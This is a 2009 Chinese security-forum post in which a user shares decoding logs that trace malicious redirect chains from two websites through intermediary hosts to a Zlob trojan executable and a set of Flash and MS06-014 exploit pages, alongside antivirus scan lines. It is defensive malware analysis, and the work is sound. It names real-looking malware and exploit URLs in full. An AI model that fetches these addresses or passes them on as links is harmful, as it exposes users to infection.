ViRobot 2009.1.9.1551 2009.01.09 -
VirusBuster 4.5.11.0 2009.01.08 -

Rating (1 participant, experience +33): qianwenxiang +33, reason: bonus encouragement

qianwenxiang
Thread starter | Posted on 2009-1-9 17:14:26
Both addresses are decoded~ bounty closed~

My own decoding log from yesterday: (1ylpho.cn returned Zlob; for the FakeAlert result see post 6)

关于:hxxp://1ylpho.cn/解密的日志(全体输出-  7):

Level 0>http://1ylpho.cn/
Level 1>http://1ylpho.cn/currenthousebills.html
Level 2>http://1ylpho.cn/menu.js
Level 3>http://kogerta.com/in.cgi?3&seoref=http%3A%2F%2F1ylpho.cn%2F&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2F1ylpho.cn%2Fcurrenthousebills.html&para;meter=current house bills
Level 4>http://videopreviewshow.com/l/simple/id/3913123/black/white/current+house+bills/
Level 5>http://myprivatetubes2009.net/2/0/0/64/0/black/
Level 6>[TR.Zlob!]http://myprivatetubes2009.net/cd/64/0/wmpcdcs.exe


Referer-related
<script>alert("http://kogerta.com/in.cgi?3&seoref="+encodeURIComponent("http://1ylpho.cn/")+ "&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent("http://1ylpho.cn/currenthousebills.html")+"&parameter="+"current house bills");
</script>

---------------------------
Windows Internet Explorer
---------------------------
http://kogerta.com/in.cgi?3
&seoref=http%3A%2F%2F1ylpho.cn%2F&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2F1ylpho.cn%2Fcurrenthousebills.html&parameter=current house bills
---------------------------
确定   
---------------------------



日志由 Redoce1.6第28次修正版于 2009-1-8 18:55:04 生成。


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(全体输出-  27):

Level 0>http://www.yhahaz.cn/dfll/a39.htm
Level 1>http://fhahag.cn/a39/fxx.htm
Level 2>http://fhahag.cn/a01/real.html
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/real.htm
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/glworld.html
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/bfyy.htm
Level 2>http://fhahag.cn/a01/no.htm
Level 2>http://fhahag.cn/a01/sina.htm
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/ms06014.htm
Level 2>http://fhahag.cn/a01/ss.htm
Level 2>http://fhahag.cn/a39/fx.htm
Level 3>http://fhahag.cn/a39/flink.html
Level 4>http://fhahag.cn/a39/f16.swf  ●
Level 4>http://fhahag.cn/a39/f28.swf  ●
Level 4>http://fhahag.cn/a39/f45.swf  ●
Level 4>http://fhahag.cn/a39/f47.swf  ●
Level 4>http://fhahag.cn/a39/f64.swf  ●
Level 4>http://fhahag.cn/a39/f115.swf  ●
Level 3>http://fhahag.cn/a39/ilink.html
Level 4>http://fhahag.cn/a39/i47.swf  ●
Level 4>http://fhahag.cn/a39/i28.swf  ●
Level 4>http://fhahag.cn/a39/i16.swf  ●
Level 4>http://fhahag.cn/a39/i45.swf  ●

日志由 Redoce1.6第28次修正版于 2009-1-8 19:03:15 生成。